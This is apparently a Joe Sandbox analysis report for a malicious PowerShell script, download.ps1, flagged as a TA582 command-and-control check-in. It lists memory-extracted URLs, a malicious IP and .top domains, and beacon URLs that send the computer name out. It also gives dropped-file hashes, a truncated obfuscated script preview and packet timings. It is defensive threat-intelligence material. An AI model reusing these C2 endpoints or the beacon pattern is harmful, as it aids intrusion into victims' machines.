00000000.00000002.2182558071.000001D9B61B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61B0000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://0.google.com/ | powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/webhp?tab=ww | powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schema.org/WebPageX | powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com/finance?tab=we | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://maps.google.com/maps?hl=en&tab=wl | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.google.com | powershell.exe, 00000000.00000002.2182558071.000001D9B52B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52CF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://apis.google.com | powershell.exe, 00000000.00000002.2182558071.000001D9B54B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2182558071.000001D9B3AD1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.blogger.com/?tab=wj | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://$n57epo4a2v6u0zx/$xme7jrzn1ow6thf.php?id=$env:computername&key=$pagxhc&s=527 | powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B50A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.google.com/mobile/?hl=en&tab=wD | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://play.google.com/?hl=en&tab=w8 | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com/imghp?hl=en&tab=wi | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com/shopping?hl=en&source=og&tab=wf | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.microsoftF | powershell.exe, 00000000.00000002.2223453498.000001D9CBBF0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lh3.googleusercontent.com/ogw/default-user=s96 | powershell.exe, 00000000.00000002.2215308763.000001D9C3DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://drive.google.com/?tab=wo | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://0.google | powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mail.google.com/mail/?tab=wm | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.youtube.com/?tab=w1 | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://0.google. | powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lh3.googleusercontent.com/ogw/default-user=s96X | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://0.google.com/ | powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lh3.googleusercontent.com/ogw/default-user=s24 | powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.google.com/history/optout?hl=en | powershell.exe, 00000000.00000002.2182558071.000001D9B52CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://books.google.com/?hl=en&tab=wp | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://translate.google.com/?hl=en&tab=wT | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com/intl/en/about/products?tab=whX | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://calendar.google.com/calendar?tab=wc | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.2182558071.000001D9B3AD1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://lh3.googleusercontent.com/ogw/default-user=s24X | powershell.exe, 00000000.00000002.2182558071.000001D9B54B4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
45.61.136.138 | jjdgdeffjimfgne.top | United States | 40676 | AS40676US | true
142.250.184.228 | www.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585341
Start date and time: 2025-01-07 14:33:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: download.ps1
Detection: MAL
Classification: mal68.evad.winPS1@2/7@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 14
• Number of non-executed functions: 14
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5032 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: download.ps1
Time | Type | Description
08:34:03 | API Interceptor | 43x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
45.61.136.138 | download.ps1 | malicious | Unknown | bfhdkgmmhdbikgj.top/3dy4fnsuzmhtr.php?id=computer&key=40391840945&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | bfhdkgmmhdbikgj.top/f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | bfhdkgmmhdbikgj.top/gz782b5rhjhtr.php?id=computer&key=73964595488&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | bfhdkgmmhdbikgj.top/8j3zac462bhtr.php?id=user-PC&key=66957681081&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kcehmenjdibnmni.top/sgat4cebpihtr.php?id=computer&key=24472055606&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kcehmenjdibnmni.top/g6n2wfvsr0htr.php?id=user-PC&key=95416299579&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kcehmenjdibnmni.top/m15teydqhphtr.php?id=computer&key=27186586974&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kcehmenjdibnmni.top/trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kcehmenjdibnmni.top/sce6dujwmhhtr.php?id=computer&key=21283751447&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kcehmenjdibnmni.top/hlofm1brkshtr.php?id=user-PC&key=62803468549&s=527
                                                                                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS40676US | miori.m68k.elf | malicious | Unknown | 206.201.59.150
AS40676US | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676US | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676US | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676US | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676US | LZUCldA1ro.exe | malicious | Unknown | 207.231.107.137
AS40676US | LZUCldA1ro.exe | malicious | Unknown | 207.231.107.137
AS40676US | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676US | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676US | download.ps1 | malicious | Unknown | 45.61.136.138
                                                                                          No context
                                                                                          No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllul7got/Z:NllUkot
MD5: 71995B6B43EA2A2D49079E9E99E8D184
SHA1: A55CE57E044A814007D3EE7DCCF1527EF391036A
SHA-256: FD011C1349ABA970E984930A34129F61F60BF70A92E4E1748C4DCFFA3E22DFBF
SHA-512: 6CFBFC9B41995E53733EDCEC9747C4B7EA800D267145D6A879637CBC2B96E06C1D8CFEE9CDC59A6E57A32AEFE5A941448A029B16F4B2A11EF8CC0F579352509A
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e................................................@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6224
Entropy (8bit): 3.7198077928349793
Encrypted: false
SSDEEP: 96:oWyj3CkTSkvhkvCCtuiZMceHobZMcxHom:oWyvKuiZNbZEm
MD5: AAA2174C701D4FE5ABD29C1E6AA3855F
SHA1: 42B15535D272E4F8441760BCCF98F1C4C851CED1
SHA-256: 41F7D4F2A70247DD9E6D8C1640B515C315A30974F7A30DC5BB440AF89D3A9873
SHA-512: F27A32A96904B1530A42A525EEA639D1CF08D147E0BD3816E53436A0F0AB49253B4F12E5FEB105C323BBD910941ABA8A326803E62E62EFB40F3B4470C997A3A6
Malicious: false
Preview: ...................................FL..................F.".. ...J.S........a..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...%8...a.......a......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2'Z@l...........................^.A.p.p.D.a.t.a...B.V.1.....'Z<l..Roaming.@......EW<2'Z<l..../........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2'Z9l....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2'Z9l....2......................d..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2'Z9l....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2'Z9l....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2'ZAl....u...........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6224
Entropy (8bit): 3.7198077928349793
Encrypted: false
SSDEEP: 96:oWyj3CkTSkvhkvCCtuiZMceHobZMcxHom:oWyvKuiZNbZEm
MD5: AAA2174C701D4FE5ABD29C1E6AA3855F
SHA1: 42B15535D272E4F8441760BCCF98F1C4C851CED1
SHA-256: 41F7D4F2A70247DD9E6D8C1640B515C315A30974F7A30DC5BB440AF89D3A9873
SHA-512: F27A32A96904B1530A42A525EEA639D1CF08D147E0BD3816E53436A0F0AB49253B4F12E5FEB105C323BBD910941ABA8A326803E62E62EFB40F3B4470C997A3A6
Malicious: false
Preview: ...................................FL..................F.".. ...J.S........a..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...%8...a.......a......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2'Z@l...........................^.A.p.p.D.a.t.a...B.V.1.....'Z<l..Roaming.@......EW<2'Z<l..../........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2'Z9l....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2'Z9l....2......................d..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2'Z9l....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2'Z9l....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2'ZAl....u...........
File type: ASCII text, with very long lines (10701), with CRLF line terminators
Entropy (8bit): 5.9631506020067
TrID:
File name: download.ps1
File size: 19'770 bytes
MD5: 6e85589d5b99cc0147e0a2411c974061
SHA1: 762c32d847189b201d92f50d641ad751ea90a613
SHA256: de56f2adb28159654d43754aed8f485a3f4808d759103434882f3e9290bfb8dd
SHA512: 61a4d14cc3ab65665459ce849982e5a6a0e1616bb49468c0689974fd4db21fbe927f9b23879f07b70bd1e2aeb8f42b824f9107fde5bbcd7dca2f144f7573d542
SSDEEP: 384:DDg1fKq9FGEutbLkJE3mhISw40hO6yBz+Iv4ksoDRgKd:XgfJJhaFSBzJpgKd
TLSH: 40925CB427C4FDE1C66E4B2E6902FC043A24746FD5E7A8C8AB9995C623A47102F2ED45
File Content Preview: $gwrxbc=$executioncontext;$altionenaresistionbeisined = -join (0..54 | ForEach-Object {[char]([int]"00000000000001230000000000000122000000000000012700000000000001200000000000000126000000000000012400000000000001260000000000000125000000000000012500000000000
Icon Hash: 3270d6baae77db44
Timestamp                       | SID     | Signature                                             | Severity | Source IP   | Source Port | Dest IP         | Dest Port | Protocol
2025-01-07T14:34:07.935887+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2        | 192.168.2.6 | 49710       | 45.61.136.138   | 80        | TCP
2025-01-07T14:34:07.935887+0100 | 2057741 | ET MALWARE TA582 CnC Checkin                          | 1        | 192.168.2.6 | 49710       | 45.61.136.138   | 80        | TCP
2025-01-07T14:34:08.572367+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2        | 192.168.2.6 | 49711       | 142.250.184.228 | 80        | TCP
Timestamp                          | Source Port | Dest Port | Source IP       | Dest IP
Jan 7, 2025 14:34:06.961550951 CET | 49710       | 80        | 192.168.2.6     | 45.61.136.138
Jan 7, 2025 14:34:06.966883898 CET | 80          | 49710     | 45.61.136.138   | 192.168.2.6
Jan 7, 2025 14:34:06.966955900 CET | 49710       | 80        | 192.168.2.6     | 45.61.136.138
Jan 7, 2025 14:34:06.971807003 CET | 49710       | 80        | 192.168.2.6     | 45.61.136.138
Jan 7, 2025 14:34:06.976639032 CET | 80          | 49710     | 45.61.136.138   | 192.168.2.6
Jan 7, 2025 14:34:07.881592989 CET | 80          | 49710     | 45.61.136.138   | 192.168.2.6
Jan 7, 2025 14:34:07.892229080 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:07.897109985 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:07.897232056 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:07.897388935 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:07.902254105 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:07.935887098 CET | 49710       | 80        | 192.168.2.6     | 45.61.136.138
Jan 7, 2025 14:34:08.572280884 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.572295904 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.572307110 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.572316885 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.572328091 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.572336912 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.572346926 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.572357893 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.572369099 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.572366953 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.572381020 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.572443008 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.577210903 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.577225924 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.577282906 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.658988953 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.659008980 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.659018993 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.659095049 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.661762953 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.661775112 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.661834002 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.661875010 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.661899090 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.661915064 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.668087006 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.668097973 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.668107986 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.668158054 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.674432039 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.674444914 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.674457073 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.674515009 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.680630922 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.680650949 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.680713892 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.680748940 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.680758953 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.680794954 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.687031984 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.687043905 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.687053919 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.687100887 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.687131882 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.693320990 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.693330050 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.693340063 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.693381071 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.699534893 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.699544907 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.699599981 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.699630976 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.699640989 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.699671030 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.706387043 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.706398964 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.706409931 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.706448078 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.706485987 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.728044987 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.728056908 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.728068113 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.728131056 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.745812893 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.745824099 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.745832920 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.745873928 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.745903969 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
